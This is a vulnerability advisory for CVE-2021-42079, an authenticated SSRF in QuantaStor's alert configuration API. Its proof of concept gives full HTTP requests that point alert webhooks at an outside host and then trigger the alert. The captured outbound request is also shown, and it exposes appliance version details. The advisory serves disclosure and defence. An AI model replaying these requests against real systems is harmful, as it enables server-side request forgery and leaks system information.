CVE-2021-42079

Description

An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests. POC Step 1: Prepare the SSRF with a request like this: GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Connection: close authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json Content-Length: 0 Step 2: Trigger this alert with this request GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Connection: close authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json Content-Length: 1 The post request received by <TARGET> looks like this: {   ### Python FLASK stuff ####  endpoint: index,   method: POST,   cookies: ImmutableMultiDict([]),   ### END Python FLASK stuff ####   data: b{   "attachments": [    {     "fallback": "[122] test / test.",     "color": "#aa2222",     "title": "[122] test",     "text": "test",     "fields": [        {           "title": "Alert Severity",           "value": "CRITICAL",           "short": false        },  {         "title": "Appliance",           "value": "quantastor (https://<HOSTNAME>)",           "short": true        },  {           "title": "System / Driver / Kernel Ver",           "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",           "short": false        },  {           "title": "System Startup",           "value": "Fri Aug  6 16-02-55 2021",           "short": true         },  {           "title": "SSID",           "value": "f4823762-1dd1-1333-47a0-6238c474a7e7",           "short": true        },     ],     "footer": "QuantaStor Call-home Alert",     "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",     "ts": 1628461774    }   ],   "mrkdwn":true  },  #### FLASK REQUEST STUFF #####  headers: {   Host: <redacted>,   User-Agent: curl/7.58.0,   Accept: */*,   Content-Type: application/json,   Content-Length: 790  },  args: ImmutableMultiDict([]),  form: ImmutableMultiDict([]),  remote_addr: 217.103.63.173,  path: /payload/58,  whois_ip: TNF-AS, NL } #### END FLASK REQUEST STUFF #####